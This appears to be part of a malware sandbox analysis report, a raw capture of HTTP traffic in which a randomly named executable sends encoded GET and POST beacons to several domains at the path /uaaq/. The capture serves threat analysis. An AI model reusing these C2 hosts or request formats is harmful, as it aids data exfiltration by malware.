33 54 34 52 4d 50 63 32 52 43 6a 6e 76 71 4d 53 49 2f 76 78 34 59 52 4a 2f 38 4e 73 49 77 77 50 6a 6a 66 72 47 39 6c 53 69 49 36 76 61 37 31 38 67 72 57 52 50 73 51 58 35 74 79 59 30 54 30 2f 6b 66 4e 75 52 4d 4f 45 31 4c 67 4c 65 44 6c 78 6c 71 4c 50 6a 50 76 56 78 55 72 42 68 2b 66 41 45 37 52 74 54 31 43 32 49 76 34 37 50 75 6e 7a 6a 61 42 79 41 71 44 34 4d 57 6b 4b 6e 4e 78 44 49 39 31 54 6b 69 72 66 2f 69 73 63 66 39 2b 50 76 72 61 77 46 78 44 44 6f 35 52 76 57 77 61 6d 67 42 43 38 62 48 30 6b 4c 4c 6b 66 7a 51 32 4c 4c 58 74 6a 76 66 62 66 51 69 45 35 70 45 45 6c 37 4a 77 54 50 31 31 4e 67 73 46 51 2f 51 6a 39 50 57 31 6f 6f 77 78 77 4e 46 62 2b 64 6c 4b 53 46 34 44 31 71 7a 74 44 43 56 63 69 68 57 36 45 63 70 33 41 39 55 32 74 78 48 46 50 77 72 61 6f 52 38 68 46 4f 55 65 48 31 63 31 76 74 5a 30 56 31 4b 68 53 72 49 55 54 43 66 31 58 61 47 64 45 75 50 7a 47 74 34 30 6d 49 79 54 2f 47 56 69 47 4d 4a 69 73 78 47 43 4a 55 45 6e 64 6d 5a 31 32 55 75 6b 45 50 61 43 4e 52 69 6c 70 61 5a 45 4c 77 6a 51 7a 52
                                                                                    Data Ascii: 9pG0L=rOoNk3lcyTEBtAIya0ThQATwW2m35MGswfq1tvggrlQ+ktIb85JoRux5DlMM9h7dFI65/YfV68u3rhQ1f2ZjNebOpd/b3p9aKB932OPB641m6Idov5do/LajJIol6sV9esKMxjZVa0/5ZfT70BiiNdDkbuR2cnt1uIHGhBkKYCbsjr+b1l6cNGK5q3W/YVUKI/VYHWWFZHko+FNf2ccAy7/Z21w2S2onCwv6+0LbU/zRhEQtOf7GLpNMYbMc7jaXCpbIJm4FXzb8I6afSgdDLQtulYwSemjW6sEeSVXNarZcbzlTzAabkx+u85SSYYexJsICmGy+XNvGav/vWk6BJkQhVIHOVSrXfNjnEr4WUsXuH3JQuTTjUlXkMPb5RZC6O++W6QTTUIayZRHIpo8pCa9mXsUYUgkYziSnBJ8JnpO/p5pJDv445ZUMJ1P0RCvEZ5NBS+e+c7NUzMoYFSG+/BKXSDRVtqeixuYIKUrNXQYKgmCFtYN/EuqfMbrYZf50Yf5MhlMioN4BSeT40nGm2Vra/JIO5hSXfORSRBTEJGgygsZJoSDfv7wHMWWUV+3vAQRVNAKWaetFq+lUcdUVgoOoI7RzfduaQrtVVJEubQ2GSZAdUs9u+Vtdn+eH6UT9RrbHhyaSoytwN7xX+hePStXTNzrJAcaUYK3a39mGwM09QNZBl9dRjyP8HORg8u/eMCnQeYI0hX99qwoP+JZk0+3G1HWwTqL4fdaoFN6PL1HderKQGztxitdpX/sNQRE3u9USxyz3T4RMPc2RCjnvqMSI/vx4YRJ/8NsIwwPjjfrG9lSiI6va718grWRPsQX5tyY0T0/kfNuRMOE1LgLeDlxlqLPjPvVxUrBh+fAE7RtT1C2Iv47PunzjaByAqD4MWkKnNxDI91Tkirf/iscf9+PvrawFxDDo5RvWwamgBC8bH0kLLkfzQ2LLXtjvfbfQiE5pEEl7JwTP11NgsFQ/Qj9PW1oowxwNFb+dlKSF4D1qztDCVcihW6Ecp3A9U2txHFPwraoR8hFOUeH1c1vtZ0V1KhSrIUTCf1XaGdEuPzGt40mIyT/GViGMJisxGCJUEndmZ12UukEPaCNRilpaZELwjQzR
                                                                                    Dec 4, 2023 12:09:27.841583967 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:27 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    73192.168.11.304983391.195.240.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:30.362260103 CET426OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=mMAtnDth0zIbmmwbJQD8SlCQVGGtkMLB+9yssOEsh1d4l9lYjNEmW7ArbhIk2T6dCq7f547m+Me71T0/Rw5JLcbntfWt6c4bbw== HTTP/1.1
                                                                                    Host: www.infinite-7.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:30.545711040 CET161INHTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:09:30 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    74192.168.11.3049834133.130.64.24803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:35.838227987 CET707OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 32 35 50 76 44 6d 78 54 50 41 5a 77 4a 4e 50 53 30 43 43 68 32 36 6a 55 37 4f 72 2f 52 4d 51 69 78 75 53 78 41 63 71 35 73 46 71 6a 38 41 63 4f 74 48 70 4b 46 35 57 6b 39 65 72 61 44 57 33 74 47 43 47 78 38 4b 45 46 57 42 67 48 68 37 33 75 44 32 54 41 70 62 50 70 4e 39 77 44 62 38 78 57 6e 4a 6f 74 69 53 48 79 41 69 36 79 6d 53 5a 71 65 58 48 72 38 7a 78 48 63 37 51 4a 36 42 43 4d 63 43 2b 64 6d 4a 53 47 56 63 6a 65 71 71 6e 69 42 6e 76 62 66 4d 39 6d 36 43 45 34 54 67 48 35 61 7a 49 2f 6e 54 45 42 39 39 41 45 57 35 70 58 73 67 3d 3d
                                                                                    Data Ascii: 9pG0L=25PvDmxTPAZwJNPS0CCh26jU7Or/RMQixuSxAcq5sFqj8AcOtHpKF5Wk9eraDW3tGCGx8KEFWBgHh73uD2TApbPpN9wDb8xWnJotiSHyAi6ymSZqeXHr8zxHc7QJ6BCMcC+dmJSGVcjeqqniBnvbfM9m6CE4TgH5azI/nTEB99AEW5pXsg==
                                                                                    Dec 4, 2023 12:09:36.129631042 CET267INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:35 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:09:36.129713058 CET1314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    75192.168.11.3049835133.130.64.24803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:38.651577950 CET727OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 32 35 50 76 44 6d 78 54 50 41 5a 77 62 35 7a 53 31 6c 65 68 33 61 6a 54 2b 4f 72 2f 62 73 51 6d 78 75 57 78 41 59 61 58 73 33 2b 6a 38 68 73 4f 2f 7a 64 4b 43 35 57 6b 31 2b 72 44 4d 32 33 6d 47 43 62 4f 38 4b 49 46 57 42 45 48 68 36 6e 75 41 48 54 44 7a 72 50 72 42 64 77 42 47 73 78 57 6e 4a 6f 74 69 53 69 56 41 69 79 79 6d 42 42 71 63 32 48 73 31 54 78 45 62 37 51 4a 72 78 43 49 63 43 2f 34 6d 49 50 52 56 5a 2f 65 71 72 58 69 43 32 76 63 51 4d 39 73 6e 79 46 4c 55 6a 2b 42 56 69 6c 6e 33 79 59 50 75 76 59 52 58 73 46 45 72 61 75 72 2b 6a 4b 4d 49 56 59 4e 69 67 4d 4d 71 64 6b 56 2b 36 51 3d
                                                                                    Data Ascii: 9pG0L=25PvDmxTPAZwb5zS1leh3ajT+Or/bsQmxuWxAYaXs3+j8hsO/zdKC5Wk1+rDM23mGCbO8KIFWBEHh6nuAHTDzrPrBdwBGsxWnJotiSiVAiyymBBqc2Hs1TxEb7QJrxCIcC/4mIPRVZ/eqrXiC2vcQM9snyFLUj+BViln3yYPuvYRXsFEraur+jKMIVYNigMMqdkV+6Q=
                                                                                    Dec 4, 2023 12:09:38.940289974 CET267INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:38 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:09:38.940367937 CET1314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    76192.168.11.3049836133.130.64.24803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:41.461824894 CET1644OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.resolution-pj.com
                                                                                    Referer: http://www.resolution-pj.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 32 35 50 76 44 6d 78 54 50 41 5a 77 62 35 7a 53 31 6c 65 68 33 61 6a 54 2b 4f 72 2f 62 73 51 6d 78 75 57 78 41 59 61 58 73 33 47 6a 38 54 6b 4f 75 6b 42 4b 44 35 57 6b 2f 65 72 47 4d 32 33 37 47 43 43 48 38 4b 30 7a 57 44 4d 48 67 64 6e 75 58 46 37 44 6d 37 50 72 50 4e 77 4d 62 38 78 35 6e 50 49 70 69 53 53 56 41 69 79 79 6d 41 78 71 59 6e 48 73 7a 54 78 48 63 37 51 46 36 42 43 67 63 44 57 46 6d 49 4c 42 56 4b 6e 65 72 4c 48 69 44 41 37 63 5a 4d 39 71 6b 79 46 54 55 69 43 65 56 69 49 57 33 79 74 69 75 6f 38 52 55 59 59 44 79 4f 33 74 38 68 65 6e 4f 46 49 43 71 30 38 32 75 66 55 47 6a 50 6e 32 66 54 43 30 43 67 71 55 52 4e 44 52 4d 67 63 46 46 37 44 78 6a 47 35 2b 70 57 49 6d 55 63 64 79 68 52 7a 67 55 67 77 6f 44 6a 48 79 56 6c 44 71 4a 48 6c 79 77 4a 32 59 64 44 74 59 65 48 7a 6e 37 38 7a 55 55 7a 48 6b 5a 33 30 63 31 32 61 6d 75 2f 73 53 66 53 61 2b 51 35 54 52 6e 41 77 69 34 62 39 32 4b 4b 74 76 35 45 59 4d 45 32 37 70 79 62 30 78 6d 68 61 36 61 72 39 31 72 30 2b 2b 65 36 50 42 61 57 58 63 68 79 73 38 78 56 6c 74 73 6d 59 71 75 5a 76 4d 6c 65 6a 32 46 69 59 69 76 50 78 67 38 4d 78 69 73 4d 41 49 2f 4f 46 50 61 2b 52 5a 7a 52 75 5a 6c 52 6f 6b 37 35 6b 67 46 6c 35 61 56 62 70 7a 62 79 73 6c 48 38 66 39 6d 2b 35 53 2f 75 64 30 45 35 6c 43 4e 51 52 31 56 48 64 6e 54 62 57 44 49 6b 52 34 6e 43 43 34 39 73 58 4e 46 45 77 59 76 33 52 6d 32 32 32 6b 74 52 6e 30 4f 34 2b 36 31 2f 56 63 30 53 33 42 70 74 62 64 34 53 6d 56 65 54 55 4e 68 50 65 55 45 67 77 62 68 6b 4b 35 71 74 46 30 52 36 63 63 78 43 66 61 37 46 64 71 66 50 6a 34 30 54 32 7a 56 56 69 47 36 55 64 70 33 42 76 5a 7a 50 63 63 57 61 33 2f 59 4c 6d 45 4b 37 34 6e 37 2b 47 36 46 63 67 36 45 4c 2f 61 57 38 69 33 58 6e 6a 43 44 4a 63 68 61 47 64 53 50 2b 6c 6b 42 38 6d 2f 6c 34 6b 46 6d 4f 52 72 30 6b 62 58 51 38 48 63 31 79 50 65 51 4d 77 70 61 43 77 4a 67 71 56 79 61 34 70 66 53 42 77 56 68 50 69 6c 7a 75 58 67 4e 41 51 55 32 72 75 6b 78 6e 59 65 46 37 59 69 6e 66 47 56 5a 73 4a 56 62 75 62 72 55 45 2b 47 70 2f 74 41 7a 71 55 55 57 5a 54 73 63 48 59 30 35 75 43 36 37 56 66 73 4e 76 67 55 51 6a 54 70 34 42 33 30 4c 35 2b 51 5a 36 48 48 30 31 74 42 47 78 77 71 6e 48 6e 68 6c 63 71 46 70 65 63 64 6f 6a 6e 7a 6c 51 48 42 6a 61 64 58 65 56 78 33 39 35 38 44 34 43 38 78 69 6d 6e 49 58 48 77 58 37 73 48 48 37 69 2b 4a 72 78 52 72 38 47 73 53 6f 52 42 4a 50 6d 34 2f 54 34 4f 61 7a 58 51 4c 69 4c 66 6b 38 31 44 6f 62 73 73 4e 38 4a 53 6f 64 53 34 6d 35 66 61 69 76 2b 58 78 70 46 57 6a 33 59 41 36 58 4c 37 6e 52 4e 2f 4b 4b 54 33 78 6e 6a 39 70 7a 76 72 45 73 57 4f 48 6f 37 2b 30 30 78 75 48 68 47 6d 6f 66 54 58 30 64 37 70 7a 49 36 78 35 36 49 73 5a 79 45 6f 77 70 4d 36 5a 35 6d 50 50 43 33 71 51 6f 65 75 6e 32 58 77 2b 6b 45 75 45 4b 6d 41 4e 34 2b 41 36 6d 35 51 39 6a 67 53 6d 4f 65 50 52 75 77 76 43 6b 32 2f 69 6d 4f 78 58 76 4b 65 68 38 57 66 51 34 6f 64 32 49 39 55 51 69 42 71 39 4f 6f 62 4e 31 4d 39 2f 73 43 44 36 37 76 4d 39 30 42 77 77 58 43 41 30 64 57 42 54 50 32 53 53 65 79 61 6e 2b 78 45 78 71 56 50 36 6d 52 42 48 42 39 6b 79 7a 4c 6b 56 33 32 67 4f 78 71 66 70 52 72 37 66 34 42 32 66 48 31 37 44 61 61 46 56 39 39 56 62 6d 66 65 36 38 4f 78 32 76 4e 51 59 4e 51 38 51 51 43 70 4b 54 2f 30 61 57 33 52 31 39 73 69 61 37 63 48 4a 5a 4b 79 4a 31 66 31 52 57 49 7a 2f 41 68 78 68 64 76 6a 51 32 2b 74 48 37 36 38 46 39 39 2b 59 77 6c 62 59
                                                                                    Data Ascii: 9pG0L=25PvDmxTPAZwb5zS1leh3ajT+Or/bsQmxuWxAYaXs3Gj8TkOukBKD5Wk/erGM237GCCH8K0zWDMHgdnuXF7Dm7PrPNwMb8x5nPIpiSSVAiyymAxqYnHszTxHc7QF6BCgcDWFmILBVKnerLHiDA7cZM9qkyFTUiCeViIW3ytiuo8RUYYDyO3t8henOFICq082ufUGjPn2fTC0CgqURNDRMgcFF7DxjG5+pWImUcdyhRzgUgwoDjHyVlDqJHlywJ2YdDtYeHzn78zUUzHkZ30c12amu/sSfSa+Q5TRnAwi4b92KKtv5EYME27pyb0xmha6ar91r0++e6PBaWXchys8xVltsmYquZvMlej2FiYivPxg8MxisMAI/OFPa+RZzRuZlRok75kgFl5aVbpzbyslH8f9m+5S/ud0E5lCNQR1VHdnTbWDIkR4nCC49sXNFEwYv3Rm222ktRn0O4+61/Vc0S3Bptbd4SmVeTUNhPeUEgwbhkK5qtF0R6ccxCfa7FdqfPj40T2zVViG6Udp3BvZzPccWa3/YLmEK74n7+G6Fcg6EL/aW8i3XnjCDJchaGdSP+lkB8m/l4kFmORr0kbXQ8Hc1yPeQMwpaCwJgqVya4pfSBwVhPilzuXgNAQU2rukxnYeF7YinfGVZsJVbubrUE+Gp/tAzqUUWZTscHY05uC67VfsNvgUQjTp4B30L5+QZ6HH01tBGxwqnHnhlcqFpecdojnzlQHBjadXeVx3958D4C8ximnIXHwX7sHH7i+JrxRr8GsSoRBJPm4/T4OazXQLiLfk81DobssN8JSodS4m5faiv+XxpFWj3YA6XL7nRN/KKT3xnj9pzvrEsWOHo7+00xuHhGmofTX0d7pzI6x56IsZyEowpM6Z5mPPC3qQoeun2Xw+kEuEKmAN4+A6m5Q9jgSmOePRuwvCk2/imOxXvKeh8WfQ4od2I9UQiBq9OobN1M9/sCD67vM90BwwXCA0dWBTP2SSeyan+xExqVP6mRBHB9kyzLkV32gOxqfpRr7f4B2fH17DaaFV99Vbmfe68Ox2vNQYNQ8QQCpKT/0aW3R19sia7cHJZKyJ1f1RWIz/AhxhdvjQ2+tH768F99+YwlbY
                                                                                    Dec 4, 2023 12:09:41.758013010 CET267INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:41 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:09:41.758191109 CET1314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    77192.168.11.3049837133.130.64.24803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:45.413652897 CET429OUTGET /uaaq/?9pG0L=77nPASVBGS1VUo/R/j6d44mDwP+QIahx3JuWX6aukgDTtShzh3giMrfi3qntC2nVHjeoyaY8HDsr1L/VBT/etq3vOO5xT7Atwg==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.resolution-pj.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:45.701809883 CET267INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:09:45 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Tue, 13 Sep 2022 05:08:13 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 1260
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Dec 4, 2023 12:09:46.038635969 CET1314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    78192.168.11.304983891.195.240.117803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:51.232829094 CET695OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.atlasmisc.org
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.atlasmisc.org
                                                                                    Referer: http://www.atlasmisc.org/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 49 74 38 42 41 61 6b 31 2f 77 52 51 68 44 6c 71 6d 58 74 68 76 59 6f 7a 4b 4e 66 4b 46 73 53 45 75 4e 4e 64 72 6e 73 53 41 74 76 59 4a 70 33 4d 63 37 6d 53 47 56 77 70 47 61 7a 47 59 48 46 2b 33 58 42 5a 71 6a 62 44 6d 78 45 61 6b 50 6a 58 74 56 6a 50 4e 56 44 63 55 2f 58 56 73 30 52 38 43 53 78 4f 39 77 70 4d 4e 31 30 4e 54 56 75 67 47 38 59 61 4d 2f 51 6a 53 67 71 65 38 4c 2f 41 42 31 4b 76 66 33 64 5a 6b 53 54 6c 43 59 78 55 65 48 77 39 35 2b 30 71 49 54 54 66 48 57 46 55 5a 6d 75 4e 50 77 4e 61 68 49 48 72 42 55 4b 6a 46 67 3d 3d
                                                                                    Data Ascii: 9pG0L=It8BAak1/wRQhDlqmXthvYozKNfKFsSEuNNdrnsSAtvYJp3Mc7mSGVwpGazGYHF+3XBZqjbDmxEakPjXtVjPNVDcU/XVs0R8CSxO9wpMN10NTVugG8YaM/QjSgqe8L/AB1Kvf3dZkSTlCYxUeHw95+0qITTfHWFUZmuNPwNahIHrBUKjFg==
                                                                                    Dec 4, 2023 12:09:51.415908098 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:09:51 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
